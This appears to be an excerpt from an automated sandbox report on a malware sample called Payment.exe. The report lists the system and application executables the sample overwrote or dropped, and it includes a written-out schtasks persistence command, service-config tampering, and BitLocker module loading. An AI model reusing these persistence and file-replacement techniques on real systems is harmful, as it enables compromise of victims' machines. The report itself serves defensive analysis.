Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\SgrmBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\SgrmBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Payment.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Payment.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwBqGZseW" /XML "C:\Users\user\AppData\Local\Temp\tmp18CE.tmp"

Source: C:\Users\user\Desktop\Payment.exe

Code function: 8_2_02E6CBD0 StrStrIW,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,StartServiceW,

8_2_02E6CBD0

Hooking and other Techniques for Hiding and Protection

Creates files inside the volume driver (system volume information)

Source: C:\Windows\System32\TieringEngineService.exe

File created: C:\System Volume Information\Heat\

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
